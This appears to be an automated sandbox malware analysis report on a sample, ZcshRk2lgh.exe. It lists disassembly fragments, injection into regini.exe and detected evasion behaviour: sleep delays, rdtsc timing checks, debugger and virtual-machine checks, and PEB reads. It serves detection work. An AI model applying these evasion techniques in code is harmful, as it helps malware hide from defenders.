                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 0_2_02A5AD3A push edx; ret 0_2_02A5AD3B
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 0_2_02A55318 pushfd ; ret 0_2_02A55332
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 0_2_0719147A push cs; ret 0_2_07191486
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 0_2_07192358 push es; ret 0_2_07192366
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 0_2_07190AB2 push cs; ret 0_2_07190AC6
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 11_2_0040D066 push cs; retf 11_2_0040D068
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 11_2_00416123 push ecx; iretd 11_2_00416145
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 11_2_0041692E push eax; ret 11_2_00416930
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 11_2_004031F0 push eax; ret 11_2_004031F2
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 11_2_0040D192 push 32D5BE83h; retf 11_2_0040D19A
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 11_2_004082F0 push cs; ret 11_2_004082FD
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 11_2_004192F0 pushad ; retf 11_2_004192F2
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 11_2_0040D3DF push edx; retf 11_2_0040D3E1
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 11_2_014A09AD push ecx; mov dword ptr [esp], ecx 11_2_014A09B6
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_034709AD push ecx; mov dword ptr [esp], ecx 13_2_034709B6
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_009260FD pushad ; retf 13_2_009260FF
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_009306C7 push edx; iretd 13_2_009306C8
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_009306EF push ebp; ret 13_2_009306FB
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_00922F30 push ecx; iretd 13_2_00922F52
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_009150FD push cs; ret 13_2_0091510A
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_0092373B push eax; ret 13_2_0092373D
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_0327C263 push edi; retf 13_2_0327C265
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_0327F1FA push 17DCBDD3h; retf 13_2_0327F1FF
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_0327F64E push 48B9A3D6h; iretd 13_2_0327F653
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_0327451D push edi; iretd 13_2_0327453B
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_0327654A push ds; ret 13_2_03276549
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_032764AB push ds; ret 13_2_03276549
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_032764B8 push ds; ret 13_2_03276549
                Source: ZcshRk2lgh.exe Static PE information: section name: .text entropy: 7.724492265281776
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\regini.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match File source: Process Memory Space: ZcshRk2lgh.exe PID: 6340, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\regini.exe API/Special instruction interceptor: Address: 7FFB2CECD324
                Source: C:\Windows\SysWOW64\regini.exe API/Special instruction interceptor: Address: 7FFB2CECD7E4
                Source: C:\Windows\SysWOW64\regini.exe API/Special instruction interceptor: Address: 7FFB2CECD944
                Source: C:\Windows\SysWOW64\regini.exe API/Special instruction interceptor: Address: 7FFB2CECD504
                Source: C:\Windows\SysWOW64\regini.exe API/Special instruction interceptor: Address: 7FFB2CECD544
                Source: C:\Windows\SysWOW64\regini.exe API/Special instruction interceptor: Address: 7FFB2CECD1E4
                Source: C:\Windows\SysWOW64\regini.exe API/Special instruction interceptor: Address: 7FFB2CED0154
                Source: C:\Windows\SysWOW64\regini.exe API/Special instruction interceptor: Address: 7FFB2CECDA44
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Memory allocated: 2A50000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Memory allocated: 2C50000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Memory allocated: 4C50000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Memory allocated: 89B0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Memory allocated: 7440000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Memory allocated: 99B0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Memory allocated: A9B0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 11_2_014E096E rdtsc 11_2_014E096E
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe API coverage: 0.8 %
                Source: C:\Windows\SysWOW64\regini.exe API coverage: 2.7 %
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe TID: 6536 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\regini.exe TID: 2044 Thread sleep count: 40 > 30
                Source: C:\Windows\SysWOW64\regini.exe TID: 2044 Thread sleep time: -80000s >= -30000s
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe TID: 316 Thread sleep time: -55000s >= -30000s
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe TID: 316 Thread sleep time: -37500s >= -30000s
                Source: C:\Windows\SysWOW64\regini.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\regini.exe Code function: 13_2_0092C8D0 FindFirstFileW,FindNextFileW,FindClose, 13_2_0092C8D0
                Source: regini.exe, 0000000D.00000002.3092940507.0000000002EDD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllr'U
                Source: regini.exe, 0000000D.00000002.3099511798.0000000007CB1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CDYNVMware20,11696492231p
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\regini.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 11_2_00417A73 LdrLoadDll, 11_2_00417A73
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 11_2_01538158 mov eax, dword ptr fs:[00000030h] 11_2_01538158
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014AA3C0 mov eax, dword ptr fs:[00000030h]11_2_014AA3C0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014AA3C0 mov eax, dword ptr fs:[00000030h]11_2_014AA3C0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014AA3C0 mov eax, dword ptr fs:[00000030h]11_2_014AA3C0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014AA3C0 mov eax, dword ptr fs:[00000030h]11_2_014AA3C0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A83C0 mov eax, dword ptr fs:[00000030h]11_2_014A83C0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A83C0 mov eax, dword ptr fs:[00000030h]11_2_014A83C0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A83C0 mov eax, dword ptr fs:[00000030h]11_2_014A83C0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A83C0 mov eax, dword ptr fs:[00000030h]11_2_014A83C0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0154E3DB mov eax, dword ptr fs:[00000030h]11_2_0154E3DB
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0154E3DB mov eax, dword ptr fs:[00000030h]11_2_0154E3DB
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0154E3DB mov ecx, dword ptr fs:[00000030h]11_2_0154E3DB
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0154E3DB mov eax, dword ptr fs:[00000030h]11_2_0154E3DB
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_015263C0 mov eax, dword ptr fs:[00000030h]11_2_015263C0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0155C3CD mov eax, dword ptr fs:[00000030h]11_2_0155C3CD
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B03E9 mov eax, dword ptr fs:[00000030h]11_2_014B03E9
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B03E9 mov eax, dword ptr fs:[00000030h]11_2_014B03E9
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B03E9 mov eax, dword ptr fs:[00000030h]11_2_014B03E9
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B03E9 mov eax, dword ptr fs:[00000030h]11_2_014B03E9
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B03E9 mov eax, dword ptr fs:[00000030h]11_2_014B03E9
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B03E9 mov eax, dword ptr fs:[00000030h]11_2_014B03E9
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B03E9 mov eax, dword ptr fs:[00000030h]11_2_014B03E9
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B03E9 mov eax, dword ptr fs:[00000030h]11_2_014B03E9
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014D63FF mov eax, dword ptr fs:[00000030h]11_2_014D63FF
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014BE3F0 mov eax, dword ptr fs:[00000030h]11_2_014BE3F0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014BE3F0 mov eax, dword ptr fs:[00000030h]11_2_014BE3F0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014BE3F0 mov eax, dword ptr fs:[00000030h]11_2_014BE3F0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0149E388 mov eax, dword ptr fs:[00000030h]11_2_0149E388
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0149E388 mov eax, dword ptr fs:[00000030h]11_2_0149E388
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0149E388 mov eax, dword ptr fs:[00000030h]11_2_0149E388
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014C438F mov eax, dword ptr fs:[00000030h]11_2_014C438F
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014C438F mov eax, dword ptr fs:[00000030h]11_2_014C438F
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01498397 mov eax, dword ptr fs:[00000030h]11_2_01498397
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01498397 mov eax, dword ptr fs:[00000030h]11_2_01498397
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01498397 mov eax, dword ptr fs:[00000030h]11_2_01498397
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0155A250 mov eax, dword ptr fs:[00000030h]11_2_0155A250
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0155A250 mov eax, dword ptr fs:[00000030h]11_2_0155A250
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01528243 mov eax, dword ptr fs:[00000030h]11_2_01528243
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01528243 mov ecx, dword ptr fs:[00000030h]11_2_01528243
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A6259 mov eax, dword ptr fs:[00000030h]11_2_014A6259
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0149A250 mov eax, dword ptr fs:[00000030h]11_2_0149A250
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01550274 mov eax, dword ptr fs:[00000030h]11_2_01550274
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01550274 mov eax, dword ptr fs:[00000030h]11_2_01550274
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01550274 mov eax, dword ptr fs:[00000030h]11_2_01550274
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01550274 mov eax, dword ptr fs:[00000030h]11_2_01550274
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01550274 mov eax, dword ptr fs:[00000030h]11_2_01550274
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01550274 mov eax, dword ptr fs:[00000030h]11_2_01550274
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01550274 mov eax, dword ptr fs:[00000030h]11_2_01550274
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01550274 mov eax, dword ptr fs:[00000030h]11_2_01550274
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01550274 mov eax, dword ptr fs:[00000030h]11_2_01550274
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01550274 mov eax, dword ptr fs:[00000030h]11_2_01550274
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01550274 mov eax, dword ptr fs:[00000030h]11_2_01550274
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01550274 mov eax, dword ptr fs:[00000030h]11_2_01550274
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0149826B mov eax, dword ptr fs:[00000030h]11_2_0149826B
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A4260 mov eax, dword ptr fs:[00000030h]11_2_014A4260
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A4260 mov eax, dword ptr fs:[00000030h]11_2_014A4260
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A4260 mov eax, dword ptr fs:[00000030h]11_2_014A4260
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0149823B mov eax, dword ptr fs:[00000030h]11_2_0149823B
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014AA2C3 mov eax, dword ptr fs:[00000030h]11_2_014AA2C3
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014AA2C3 mov eax, dword ptr fs:[00000030h]11_2_014AA2C3
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014AA2C3 mov eax, dword ptr fs:[00000030h]11_2_014AA2C3
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014AA2C3 mov eax, dword ptr fs:[00000030h]11_2_014AA2C3
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014AA2C3 mov eax, dword ptr fs:[00000030h]11_2_014AA2C3
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B02E1 mov eax, dword ptr fs:[00000030h]11_2_014B02E1
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B02E1 mov eax, dword ptr fs:[00000030h]11_2_014B02E1
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B02E1 mov eax, dword ptr fs:[00000030h]11_2_014B02E1
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DE284 mov eax, dword ptr fs:[00000030h]11_2_014DE284
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DE284 mov eax, dword ptr fs:[00000030h]11_2_014DE284
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01520283 mov eax, dword ptr fs:[00000030h]11_2_01520283
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01520283 mov eax, dword ptr fs:[00000030h]11_2_01520283
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01520283 mov eax, dword ptr fs:[00000030h]11_2_01520283
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B02A0 mov eax, dword ptr fs:[00000030h]11_2_014B02A0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B02A0 mov eax, dword ptr fs:[00000030h]11_2_014B02A0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_015362A0 mov eax, dword ptr fs:[00000030h]11_2_015362A0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_015362A0 mov ecx, dword ptr fs:[00000030h]11_2_015362A0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_015362A0 mov eax, dword ptr fs:[00000030h]11_2_015362A0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_015362A0 mov eax, dword ptr fs:[00000030h]11_2_015362A0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_015362A0 mov eax, dword ptr fs:[00000030h]11_2_015362A0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_015362A0 mov eax, dword ptr fs:[00000030h]11_2_015362A0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A8550 mov eax, dword ptr fs:[00000030h]11_2_014A8550
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A8550 mov eax, dword ptr fs:[00000030h]11_2_014A8550
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014D656A mov eax, dword ptr fs:[00000030h]11_2_014D656A
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014D656A mov eax, dword ptr fs:[00000030h]11_2_014D656A
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014D656A mov eax, dword ptr fs:[00000030h]11_2_014D656A
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01536500 mov eax, dword ptr fs:[00000030h]11_2_01536500
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01574500 mov eax, dword ptr fs:[00000030h]11_2_01574500
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01574500 mov eax, dword ptr fs:[00000030h]11_2_01574500
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01574500 mov eax, dword ptr fs:[00000030h]11_2_01574500
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01574500 mov eax, dword ptr fs:[00000030h]11_2_01574500
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01574500 mov eax, dword ptr fs:[00000030h]11_2_01574500
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01574500 mov eax, dword ptr fs:[00000030h]11_2_01574500
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01574500 mov eax, dword ptr fs:[00000030h]11_2_01574500
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014CE53E mov eax, dword ptr fs:[00000030h]11_2_014CE53E
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014CE53E mov eax, dword ptr fs:[00000030h]11_2_014CE53E
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014CE53E mov eax, dword ptr fs:[00000030h]11_2_014CE53E
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014CE53E mov eax, dword ptr fs:[00000030h]11_2_014CE53E
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014CE53E mov eax, dword ptr fs:[00000030h]11_2_014CE53E
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B0535 mov eax, dword ptr fs:[00000030h]11_2_014B0535
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B0535 mov eax, dword ptr fs:[00000030h]11_2_014B0535
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B0535 mov eax, dword ptr fs:[00000030h]11_2_014B0535
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B0535 mov eax, dword ptr fs:[00000030h]11_2_014B0535
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B0535 mov eax, dword ptr fs:[00000030h]11_2_014B0535
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B0535 mov eax, dword ptr fs:[00000030h]11_2_014B0535
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DE5CF mov eax, dword ptr fs:[00000030h]11_2_014DE5CF
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DE5CF mov eax, dword ptr fs:[00000030h]11_2_014DE5CF
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A65D0 mov eax, dword ptr fs:[00000030h]11_2_014A65D0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DA5D0 mov eax, dword ptr fs:[00000030h]11_2_014DA5D0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DA5D0 mov eax, dword ptr fs:[00000030h]11_2_014DA5D0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DC5ED mov eax, dword ptr fs:[00000030h]11_2_014DC5ED
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DC5ED mov eax, dword ptr fs:[00000030h]11_2_014DC5ED
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A25E0 mov eax, dword ptr fs:[00000030h]11_2_014A25E0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014CE5E7 mov eax, dword ptr fs:[00000030h]11_2_014CE5E7
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014CE5E7 mov eax, dword ptr fs:[00000030h]11_2_014CE5E7
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014CE5E7 mov eax, dword ptr fs:[00000030h]11_2_014CE5E7
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014CE5E7 mov eax, dword ptr fs:[00000030h]11_2_014CE5E7
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014CE5E7 mov eax, dword ptr fs:[00000030h]11_2_014CE5E7
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014CE5E7 mov eax, dword ptr fs:[00000030h]11_2_014CE5E7
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014CE5E7 mov eax, dword ptr fs:[00000030h]11_2_014CE5E7
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014CE5E7 mov eax, dword ptr fs:[00000030h]11_2_014CE5E7
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014D4588 mov eax, dword ptr fs:[00000030h]11_2_014D4588
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A2582 mov eax, dword ptr fs:[00000030h]11_2_014A2582
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A2582 mov ecx, dword ptr fs:[00000030h]11_2_014A2582
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DE59C mov eax, dword ptr fs:[00000030h]11_2_014DE59C
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_015205A7 mov eax, dword ptr fs:[00000030h]11_2_015205A7
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_015205A7 mov eax, dword ptr fs:[00000030h]11_2_015205A7
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_015205A7 mov eax, dword ptr fs:[00000030h]11_2_015205A7
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014C45B1 mov eax, dword ptr fs:[00000030h]11_2_014C45B1
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014C45B1 mov eax, dword ptr fs:[00000030h]11_2_014C45B1
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0155A456 mov eax, dword ptr fs:[00000030h]11_2_0155A456
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DE443 mov eax, dword ptr fs:[00000030h]11_2_014DE443
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DE443 mov eax, dword ptr fs:[00000030h]11_2_014DE443
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DE443 mov eax, dword ptr fs:[00000030h]11_2_014DE443
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DE443 mov eax, dword ptr fs:[00000030h]11_2_014DE443
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DE443 mov eax, dword ptr fs:[00000030h]11_2_014DE443
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DE443 mov eax, dword ptr fs:[00000030h]11_2_014DE443
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DE443 mov eax, dword ptr fs:[00000030h]11_2_014DE443
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DE443 mov eax, dword ptr fs:[00000030h]11_2_014DE443
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0149645D mov eax, dword ptr fs:[00000030h]11_2_0149645D
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014C245A mov eax, dword ptr fs:[00000030h]11_2_014C245A
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0152C460 mov ecx, dword ptr fs:[00000030h]11_2_0152C460
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014CA470 mov eax, dword ptr fs:[00000030h]11_2_014CA470
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014CA470 mov eax, dword ptr fs:[00000030h]11_2_014CA470
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014CA470 mov eax, dword ptr fs:[00000030h]11_2_014CA470
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014D8402 mov eax, dword ptr fs:[00000030h]11_2_014D8402
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014D8402 mov eax, dword ptr fs:[00000030h]11_2_014D8402
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014D8402 mov eax, dword ptr fs:[00000030h]11_2_014D8402
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0149E420 mov eax, dword ptr fs:[00000030h]11_2_0149E420
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0149E420 mov eax, dword ptr fs:[00000030h]11_2_0149E420
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0149E420 mov eax, dword ptr fs:[00000030h]11_2_0149E420
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0149C427 mov eax, dword ptr fs:[00000030h]11_2_0149C427
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01526420 mov eax, dword ptr fs:[00000030h]11_2_01526420
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01526420 mov eax, dword ptr fs:[00000030h]11_2_01526420
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01526420 mov eax, dword ptr fs:[00000030h]11_2_01526420
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01526420 mov eax, dword ptr fs:[00000030h]11_2_01526420
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01526420 mov eax, dword ptr fs:[00000030h]11_2_01526420
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01526420 mov eax, dword ptr fs:[00000030h]11_2_01526420
